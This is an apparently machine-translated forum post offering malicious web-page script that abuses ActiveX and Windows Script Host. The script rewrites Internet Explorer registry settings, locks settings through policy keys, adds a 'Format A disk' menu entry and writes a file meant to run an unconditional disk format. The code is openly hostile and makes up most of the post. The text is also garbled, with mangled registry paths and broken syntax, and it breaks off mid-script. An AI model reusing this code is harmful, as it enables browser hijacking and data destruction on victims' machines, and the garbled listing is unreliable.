It is some malicious code that is written by Script. This has an example, causing damage to your machine, just adding a web page in the boot group, you are interested in see.
Http://caohua.myetang.com/compute/security/webpageattack.html
Generally, ActiveX modifies the registry, I give you a code study, but you can't hurt people.
// Initialize ACTIVEX control
Document.write ("
// Initialize the end of the ActiveX control
/ / Define variables
Function REG () {
Try
{
// Set Applets is 0
A = Document.Applets [0]
// Initialize Windows Script Host Shell Object
A.SETCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
a.createInstance ()
S = a.GetObject ()
// Initialize FileSystem Object
A.SETCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}")
a.createinstance ();
fs = a.GetObject ()
Try
{
// Start writing registry
/ / Set the title of IE to Internet Explorer
S.RegWrite ("HKEY_CURRENT_USER // Internet Explorer // Main // Window Title", "Internet Explorer")
/ / Set the default homepage of IE is blank page
S.RegWrite ("HKEY_CURRENT_USER //Iftware // Microsoft // Internet Explorer // Main // Start Page", "About: Blank")
/ / Let the setting the top page
S.Regwrite ("HKEY_USERS //// -//////// homepager // control panel // homepage", 0x1, "ra_dword")
/ / Let the setting classification review set the gray
S.Regwrite ("HKEY_USERS //. Default // Software // Policies // Microsoft // Internet Explorer // Control Panel // SecchangeSettings", 0x1, "Reg_dword")
// Add a call to the call file in the web page.
S.Regwrite ("HKEY_CURRENT_USER / / SOFTWARE // Microsoft // Internet Explorer // Menuext // Format A disk
//", "c: //format-a.txt. {3050f4d8-98b5-11cf-bb82-00aa00 bdCe0b}");
// Dowrd value of 0xF3 is 0xF3 Note [REG_SZ: Character type REG_DWORD: Double-byte REG_BINARY: Binary]
// There are two types of assignment to the REG_DWORD type and the REG_BINARY type.
// Directly represented the number of decimers, such as: 0, 1, etc.
// Represents the number of hexadecimal, such as: 0x12, 0xFF, etc.
S.RegWrite ("HKEY_CURRENT_USER //Ift Explorer // Menuext // Format A disk // contexts", 0xF3, "reg_dword")
// End write registry
/ / Start writing hard drive
/ / Generate a file named C: //5Flash.txt. {3050f4d8-98b5-11cf-bb82-00aa00bdcE0b}
HD = fs.createtextfile ("c: //format-a.txt. {3050f4d8-98b5-11cf-bb82-00aa00bdce0b}")
// write this file to JavaScript content
// Script in START / M for the minimization window / autotest is automatic / u for unconditional formatting